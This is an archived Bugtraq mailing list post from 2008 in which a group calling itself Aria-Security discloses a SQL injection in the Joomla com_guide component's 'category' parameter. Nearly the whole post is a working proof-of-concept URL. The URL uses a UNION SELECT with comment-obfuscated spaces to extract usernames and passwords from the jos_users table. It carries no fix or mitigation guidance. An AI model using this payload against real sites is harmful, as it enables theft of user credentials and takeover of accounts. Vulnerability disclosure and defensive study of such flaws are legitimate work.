Bugtraq mailing list archives

Joomla components com_guide "category" Remote SQL Injection [Aria-Security]

From: no-reply () Aria-security net
Date: 15 Mar 2008 23:56:22 -0000


Aria-Security Team (Persian Security Network)
http://forum.aria-security.com
--------------------------------
Join our english forum @ http://forum.aria-security.com
Shoutz: Aura, Null, Kinglet, t3rr0r1st
Joomla components com_guide "category" Remote SQL Injection



Poc:

index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,password,3,4,5,6,7,8/**/from/**/jos_users/*


Regards,
The-0utl4w
Edit/Delete Message

Current thread:

Joomla components com_guide "category" Remote SQL Injection [Aria-Security] no-reply (Mar 17)